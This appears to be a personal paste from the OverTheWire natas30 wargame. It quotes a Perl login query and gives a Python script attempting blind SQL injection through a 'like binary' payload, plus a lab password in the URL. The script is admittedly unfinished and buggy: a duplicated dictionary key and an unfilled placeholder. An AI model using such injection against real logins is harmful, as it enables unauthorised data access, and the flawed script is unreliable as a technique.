Untitled

# This is the exploitable perl DB Query

"""if ('POST' eq request_method && param('username') && param('password')){
    my $dbh = DBI->connect( "DBI:mysql:database_name","database_name", "<censored>", {'RaiseError' => 1});
    my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password'));

    my $sth = $dbh->prepare($query);
    $sth->execute();
    my $ver = $sth->fetch();
    if ($ver){
        print "win!<br>";
        print "here is your result:<br>";
        print @$ver;
    }
    else{
        print "fail";
    }
    $sth->finish();
    $dbh->disconnect();
}"""

# All I could find was this SO post: https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
# So that is what I tries, but maybe just don't get it.

import requests
import re
import string


CHAR_SET = string.ascii_letters + string.digits
PASSWORD_LENGHT = 32
session = requests.Session()

def natas30(url):
    for char in CHAR_SET:
        # I think it needs to be done like this,
        # see https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
        # But unsure how to proceed after this

        params={"username": 'natas30" and password like binary "{char}%', "username": 30, "password": "x"}
        response = session.post(url, data=params)
        # print(response.text)
        if 'fail' in response.text:
            print("FAILED")
        else:
            print(char)
            print("SUCCES")

if __name__ == '__main__':
    url = 'http://natas30:wie9iexae0Daihohv8vuu3cei9wahf0e@natas30.natas.labs.overthewire.org/'
    natas30(url)